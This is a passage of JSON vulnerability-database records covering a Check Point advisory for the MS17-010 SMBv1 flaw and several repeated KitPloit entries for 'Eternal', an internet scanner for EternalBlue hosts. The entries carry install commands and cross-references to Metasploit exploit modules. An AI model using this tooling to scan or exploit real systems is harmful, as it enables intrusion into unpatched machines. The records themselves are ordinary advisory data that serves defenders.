"vulnerable_products": ["Windows Vista", "Windows Server 2008", "Windows 7", "Windows Server 2008 R2", "Windows 8.1", "Windows Server 2012", "Windows Server 2012 R2", "Windows RT 8.1", "Windows 10", "Windows Server 2016"], "_object_type": "robots.models.checkpoint.CheckpointAdvisoryBulletin", "_object_types": ["robots.models.checkpoint.CheckpointAdvisoryBulletin", "robots.models.base.Bulletin"]}, {"id": "CPAI-2017-0203", "vendorId": null, "hash": "19557754abfd7f12e5743a129a4476d5", "type": "checkpoint_advisories", "bulletinFamily": "info", "title": "Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0146)", "description": "A remote code execution vulnerability exist in Microsoft Server Message Block 1.0 (SMBv1). The vulnerability is due to the way SMBv1 service handles certain requests. An attacker who successfully exploited the vulnerability could gain code execution on the target server.", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "", "reporter": "Check Point Advisories", "references": [], "cvelist": ["CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-11-02T03:31:46", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0146"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "symantec", "idList": ["SMNTC-96707"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-11-02T03:31:46", "rev": 2}, "score": {"value": 8.8, "vector": "NONE", "modified": "2021-11-02T03:31:46", "rev": 2}}, "objectVersion": "1.6", "severity": "Critical", "protected_by": ["Security Gateway R80", "Security Gateway R77", "Security Gateway R75"], "vulnerable_products": ["Windows Vista", "Windows Server 2008", "Windows 7", "Windows Server 2008 R2", "Windows 8.1", "Windows Server 2012 and Windows Server 2012 R2", "Windows RT 8.1", "Windows 10", "Windows Server 2016", "Server Core installation option"], "_object_type": "robots.models.checkpoint.CheckpointAdvisoryBulletin", "_object_types": ["robots.models.checkpoint.CheckpointAdvisoryBulletin", "robots.models.base.Bulletin"]}], "kitploit": [{"id": "KITPLOIT:9146046356497464176", "bulletinFamily": "tools", "title": "Eternal - An internet scanner for Eternal Blue [exploit CVE-2017-0144]", "description": "[  ](<https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png>)\n\n \nEternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144. \n \n** Requirements ** \n\n\n * masscan \n * metasploit-framework \n \n** How to Install ** \n\n\n * git clone [ https://github.com/peterpt/eternal_scanner.git ](<https://github.com/peterpt/eternal_scanner.git>)\n * cd eternal_scanner &amp;&amp; ./escan \n * OR ./escan -h (to change scanner speed) \n \n** Install Requirements ** \n\n\n * apt-get install masscan metasploit-framework \n \n** Screenshots ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s1600/eternal_scanner_02.png>)\n\n \n\n\n[  ](<https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s1600/eternal_scanner_03.png>)\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s1600/eternal_scanner_04.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s1600/eternal_scanner_05.png>)\n\n \n \n** [ Download Eternal ](<https://github.com/peterpt/eternal_scanner>) **\n", "published": "2017-07-22T20:30:34", "modified": "2017-07-22T20:30:34", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://www.kitploit.com/2017/07/eternal-internet-scanner-for-eternal.html", "reporter": "KitPloit", "references": ["https://github.com/peterpt/eternal_scanner.git", "https://github.com/peterpt/eternal_scanner"], "cvelist": ["CVE-2017-0144"], "type": "kitploit", "lastseen": "2021-07-28T14:35:34", "history": [{"bulletin": {"bulletinFamily": "tools", "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "[  ](<https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png>)\n\n \nEternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144. \n \n** Requirements ** \n\n\n * masscan \n * metasploit-framework \n \n** How to Install ** \n\n\n * git clone [ https://github.com/peterpt/eternal_scanner.git ](<https://github.com/peterpt/eternal_scanner.git>)\n * cd eternal_scanner &amp;&amp; ./escan \n * OR ./escan -h (to change scanner speed) \n \n** Install Requirements ** \n\n\n * apt-get install masscan metasploit-framework \n \n** Screenshots ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s1600/eternal_scanner_02.png>)\n\n \n\n\n[  ](<https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s1600/eternal_scanner_03.png>)\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s1600/eternal_scanner_04.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s1600/eternal_scanner_05.png>)\n\n \n \n** [ Download Eternal ](<https://github.com/peterpt/eternal_scanner>) **\n", "edition": 24, "enchantments": {"dependencies": {"modified": "2020-12-08T15:25:54", "references": [{"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"], "type": "mmpc"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": "avleonov"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"], "type": "mssecure"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"], "type": "rapid7blog"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:E18080D17705880B2E7B69B8AB125EA9"], "type": "thn"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["CVE-2017-0144"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-12-08T15:25:54", "rev": 2, "value": 7.8, "vector": "NONE"}}, "hash": "2a141aa34d5f3ac1510bbde312bd8529904dc85a8b9ab3b9f1a6e993be1d6bce", "hashmap": [{"hash": "95d55efa8ae602b327bf293a3381d168", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "97d03efd613b8501d42c93b1d42747ec", "key": "toolHref"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "published"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "modified"}, {"hash": "1b52e5b85d1d34348a9126f4ca83d047", "key": "href"}, {"hash": "aba454e3574969396c0dddcb45011dcc", "key": "reporter"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "4a931512ce65bdc9ca6808adf92d8783", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "41bcfd3a3826e72c80143f1a952e3cdf", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "4553be2119d862322dd6fec6bb385401", "key": "type"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "9df98113b3627a03ccb38f7f88ba42eb", "key": "description"}], "history": [], "href": "http://www.kitploit.com/2017/07/eternal-internet-scanner-for-eternal.html", "id": "KITPLOIT:9146046356497464176", "immutableFields": [], "lastseen": "2020-12-08T15:25:54", "modified": "2017-07-22T20:30:34", "objectVersion": "1.5", "published": "2017-07-22T20:30:34", "references": ["https://github.com/peterpt/eternal_scanner.git", "https://github.com/peterpt/eternal_scanner"], "reporter": "KitPloit", "title": "Eternal - An internet scanner for Eternal Blue [exploit CVE-2017-0144]", "toolHref": "https://github.com/peterpt/eternal_scanner", "type": "kitploit", "viewCount": 169}, "different_elements": ["cvss3", "cvss2"], "edition": 24, "lastseen": "2020-12-08T15:25:54"}, {"bulletin": {"bulletinFamily": "tools", "cvelist": ["CVE-2018-13379", "CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "[  ](<https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png>)\n\n \nEternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144. \n \n** Requirements ** \n\n\n * masscan \n * metasploit-framework \n \n** How to Install ** \n\n\n * git clone [ https://github.com/peterpt/eternal_scanner.git ](<https://github.com/peterpt/eternal_scanner.git>)\n * cd eternal_scanner &amp;&amp; ./escan \n * OR ./escan -h (to change scanner speed) \n \n** Install Requirements ** \n\n\n * apt-get install masscan metasploit-framework \n \n** Screenshots ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s1600/eternal_scanner_02.png>)\n\n \n\n\n[  ](<https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s1600/eternal_scanner_03.png>)\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s1600/eternal_scanner_04.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s1600/eternal_scanner_05.png>)\n\n \n \n** [ Download Eternal ](<https://github.com/peterpt/eternal_scanner>) **\n", "edition": 21, "enchantments": {"dependencies": {"modified": "2020-12-01T09:23:29", "references": [{"idList": ["PACKETSTORM:154146", "PACKETSTORM:154147", "PACKETSTORM:142602", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["1337DAY-ID-33134", "1337DAY-ID-33133", "1337DAY-ID-27802", "1337DAY-ID-27803"], "type": "zdt"}, {"idList": ["FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-18-384_DIRECT.NASL", "MACOSX_FORTIOS_FG-IR-18-384.NASL"], "type": "nessus"}, {"idList": ["KITPLOIT:4113749299129429805", "KITPLOIT:3198936338651332513", "KITPLOIT:7649136962324988728", "KITPLOIT:2019269538971304233", "KITPLOIT:8246989959054757447", "KITPLOIT:490853400476183024", "KITPLOIT:8604395727754154957", "KITPLOIT:3233519682504638202", "KITPLOIT:7438852402079750053", "KITPLOIT:242625370833716747"], "type": "kitploit"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"], "type": "securelist"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["AKB:35B88369-C440-49C0-98FF-C50E258FB32C"], "type": "attackerkb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["EDB-ID:42030", "EDB-ID:47288", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["CVE-2018-13379", "CVE-2017-0144"], "type": "cve"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5", "EXPLOITPACK:E222442D181419B052AACE6DA4BC8485"], "type": "exploitpack"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9"], "type": "thn"}, {"idList": ["E-691"], "type": "dsquare"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}], "rev": 2}, "score": {"modified": "2020-12-01T09:23:29", "rev": 2, "value": 5.8, "vector": "NONE"}}, "hash": "8237569ad9e335fc0c765c76909ef7decf5bf72976f5561fb0ca83040c45c971", "hashmap": [{"hash": "95d55efa8ae602b327bf293a3381d168", "key": "references"}, {"hash": "97d03efd613b8501d42c93b1d42747ec", "key": "toolHref"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "published"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "modified"}, {"hash": "1b52e5b85d1d34348a9126f4ca83d047", "key": "href"}, {"hash": "aba454e3574969396c0dddcb45011dcc", "key": "reporter"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "4a931512ce65bdc9ca6808adf92d8783", "key": "bulletinFamily"}, {"hash": "41bcfd3a3826e72c80143f1a952e3cdf", "key": "title"}, {"hash": "4553be2119d862322dd6fec6bb385401", "key": "type"}, {"hash": "9df98113b3627a03ccb38f7f88ba42eb", "key": "description"}, {"hash": "55b5f8074a1bbb9f8b397a1860b20f9b", "key": "cvelist"}], "history": [], "href": "http://www.kitploit.com/2017/07/eternal-internet-scanner-for-eternal.html", "id": "KITPLOIT:9146046356497464176", "lastseen": "2020-12-01T09:23:29", "modified": "2017-07-22T20:30:34", "objectVersion": "1.3", "published": "2017-07-22T20:30:34", "references": ["https://github.com/peterpt/eternal_scanner.git", "https://github.com/peterpt/eternal_scanner"], "reporter": "KitPloit", "title": "Eternal - An internet scanner for Eternal Blue [exploit CVE-2017-0144]", "toolHref": "https://github.com/peterpt/eternal_scanner", "type": "kitploit", "viewCount": 168}, "differentElements": ["cvelist"], "edition": 21, "lastseen": "2020-12-01T09:23:29"}, {"bulletin": {"bulletinFamily": "tools", "cvelist": ["CVE-2017-0144", "CVE-2019-0708"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "[  ](<https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png>)\n\n \nEternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144. \n \n** Requirements ** \n\n\n * masscan \n * metasploit-framework \n \n** How to Install ** \n\n\n * git clone [ https://github.com/peterpt/eternal_scanner.git ](<https://github.com/peterpt/eternal_scanner.git>)\n * cd eternal_scanner &amp;&amp; ./escan \n * OR ./escan -h (to change scanner speed) \n \n** Install Requirements ** \n\n\n * apt-get install masscan metasploit-framework \n \n** Screenshots ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s1600/eternal_scanner_02.png>)\n\n \n\n\n[  ](<https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s1600/eternal_scanner_03.png>)\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s1600/eternal_scanner_04.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s1600/eternal_scanner_05.png>)\n\n \n \n** [ Download Eternal ](<https://github.com/peterpt/eternal_scanner>) **\n", "edition": 15, "enchantments": {"dependencies": {"modified": "2019-10-18T14:34:20", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"], "type": "threatpost"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA"], "type": "thn"}, {"idList": ["MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE", "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP"], "type": "metasploit"}, {"idList": ["EDB-ID:42030", "EDB-ID:42031", "EDB-ID:47120"], "type": "exploitdb"}, {"idList": ["QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5"], "type": "qualysblog"}, {"idList": ["SMNTC-108273", "SMNTC-96704"], "type": "symantec"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["CVE-2017-0144", "CVE-2019-0708"], "type": "cve"}, {"idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["KITPLOIT:3746269283079108633", "KITPLOIT:8690827452472466093", "KITPLOIT:998955151150716619", "KITPLOIT:2846211113425563801", "KITPLOIT:2143278485443977074", "KITPLOIT:5772130773824454432", "KITPLOIT:8886349906352353597", "KITPLOIT:7460768340536359638", "KITPLOIT:4693152054138988283", "KITPLOIT:4482238198881011483"], "type": "kitploit"}, {"idList": ["MSRC:6A6ED6A5B652378DCBA3113B064E973B"], "type": "msrc"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["PACKETSTORM:142602", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"], "type": "talosblog"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27803"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310108611"], "type": "openvas"}, {"idList": ["MYHACK58:62201994152", "MYHACK58:62201995881", "MYHACK58:62201994259", "MYHACK58:62201994154", "MYHACK58:62201994234", "MYHACK58:62201994153", "MYHACK58:62201994162"], "type": "myhack58"}, {"idList": ["F5:K25238311"], "type": "f5"}]}, "score": {"modified": "2019-10-18T14:34:20", "value": 5.4, "vector": "NONE"}}, "hash": "10bd4cbc0e1e0fc1b36273b35152ff55545764cd51151d4a3f8f2c8a054081f4", "hashmap": [{"hash": "95d55efa8ae602b327bf293a3381d168", "key": "references"}, {"hash": "97d03efd613b8501d42c93b1d42747ec", "key": "toolHref"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "published"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "modified"}, {"hash": "1b52e5b85d1d34348a9126f4ca83d047", "key": "href"}, {"hash": "aba454e3574969396c0dddcb45011dcc", "key": "reporter"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "4a931512ce65bdc9ca6808adf92d8783", "key": "bulletinFamily"}, {"hash": "41bcfd3a3826e72c80143f1a952e3cdf", "key": "title"}, {"hash": "4553be2119d862322dd6fec6bb385401", "key": "type"}, {"hash": "9df98113b3627a03ccb38f7f88ba42eb", "key": "description"}, {"hash": "05a99c986a0efc7815d8eb88b690b20d", "key": "cvelist"}], "history": [], "href": "http://www.kitploit.com/2017/07/eternal-internet-scanner-for-eternal.html", "id": "KITPLOIT:9146046356497464176", "lastseen": "2019-10-18T14:34:20", "modified": "2017-07-22T20:30:34", "objectVersion": "1.3", "published": "2017-07-22T20:30:34", "references": ["https://github.com/peterpt/eternal_scanner.git", "https://github.com/peterpt/eternal_scanner"], "reporter": "KitPloit", "title": "Eternal - An internet scanner for Eternal Blue [exploit CVE-2017-0144]", "toolHref": "https://github.com/peterpt/eternal_scanner", "type": "kitploit", "viewCount": 160}, "differentElements": ["cvss", 